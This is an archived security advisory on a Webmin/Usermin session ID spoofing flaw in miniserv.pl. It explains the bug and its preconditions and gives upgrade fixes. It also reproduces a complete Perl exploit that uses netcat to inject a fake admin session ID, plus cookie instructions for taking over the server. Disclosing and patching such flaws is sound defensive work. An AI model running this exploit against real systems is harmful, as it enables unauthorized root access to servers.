26th Sep 2002 [SBWID-5340]
COMMAND
Webmin/Usermin Session ID Spoofing Vulnerability
SYSTEMS AFFECTED
Webmin Version: 0.960
Usermin Version: 0.90
Update (24 Februrary 2003)
======
Webmin Version: 1.060
Usermin Version: 0.990
PROBLEM
Keigo Yamazaki of LAC Co.,Ltd [http://www.lac.co.jp/] found :
Webmin is a web-based system administration tool for Unix. Usermin is a
web interface that allows all users on a Unix system to easily receive
mails and to perform SSH and mail forwarding configuration.
Internal communication between the parent process and the child process
using named pipes occur in these software packages during creation or
verification of a session ID, or during the setting process of password
timeouts. Because the control characters contained in the data passed
as authentication information are not eliminated, it is possible to
make Webmin and Usermin to acknowledge the combination of any user and
session ID specified by an attacker. If the attacker could log into
Webmin by using this problem, there is a possibility that arbitrary
commands may be executed with root privileges.
[Preconditions for a successful exploit]
In the case of Webmin :
* Webmin->Configuration->Authentication
"Enable password timeouts" is enabled
* if a valid Webmin username is known
by default, user "admin" exists and this user can use all the
functions, including command shell
In the case of Usermin:
* if password timeout is enabled
* if a valid Usermin username is known
Update (24 Februrary 2003)
======
In Secure Net Service(SNS) security advisory [[email protected]] a
Computer Security Laboratory, LAC :
http://www.lac.co.jp/security/english/snsadv_e/62_e.html
Bug discovered by: Keigo Yamazaki, thanks to: Jamie Cameron
A vulnerability that could result in a session ID spoofing exists in
miniserv.pl, which is a webserver program that gets both Webmin and
Usermin to run.
Problem Description:
--------------------
Webmin is a web-based system administration tool for Unix. Usermin is a
web interface that allows all users on a Unix system to easily receive
mails and to perform SSH and mail forwarding configuration.
Miniserv.pl is a webserver program that gets both Webmin and Usermin to
run. Miniserv.pl carries out named pipe communication between the
parent and the child process during for example, the creation and
confirmation of a session ID (session used for access control via the
Web) and during the password timeout process.
Miniserv.pl does not check whether metacharacters, such as line feed or
carriage return, are included with BASE64 encoded strings during the
BASIC authentication process. As a result, any user can login as an
administrative user "admin" and spoof a session ID by using the pipe.
Exploitation therefore, could make it possible for attackers to bypass
authentication and execute arbitrary command as root.
[Preconditions for the exploit]
Webmin:
* Webmin -> Configuration -> Authentication and "Enable password
timeouts" is ON
* a valid Webmin username is known
Usermin:
* "Enable password timeouts" is ON
* a valid Webmin username is known
-Also-
Carl Livitt [[email protected]] says :
Attached is an exploit for the latest Webmin vulnerability. It relies
on a non-default setting (passdelay) to be enabled.
Webmin can verify user authentication by use of a session ID (SID) that
is assigned when a user successfully authenticates to Webmin. It is
possible to inject a fake SID into the session ID database by using a
malicious username containing control sequences used internally by
Webmin.
This exploit simply creates a SID of 1234567890 for the user 'admin'.
Then, it is a simple case of creating a cookie in your favorite browser
containing:
sid=1234567890; testing=1
Such that the Cookie HTTP header contains:
Cookie: sid=1234567890; testing=1
When the webmin server recieves this cookie, it is verified as an
authentic SID and an attacker can take complete control of the Webmin
server... this is basically root access to the box it is running on.
#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#
print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";
$nc="/usr/bin/netcat";
if($#ARGV == -1) {
print "Syntax:\n\t$0 hostname\n";
exit(1);
}
$hostname=$ARGV[0];
if ( ! -x $nc ) {
print "netcat not found!\n";
exit(2);
}
open(NC, "|$nc $hostname 10000 >& /dev/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);
print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
SOLUTION
This problem can be eliminated by upgrading to Webmin version 0.970/
Usermin version 0.910, which are available at:
http://www.webmin.com/
Update (24 Februrary 2003)
======
This problem can be eliminated by upgrading to Webmin version 1.070 and
Usermin version 1.000 available at:
http://www.webmin.com/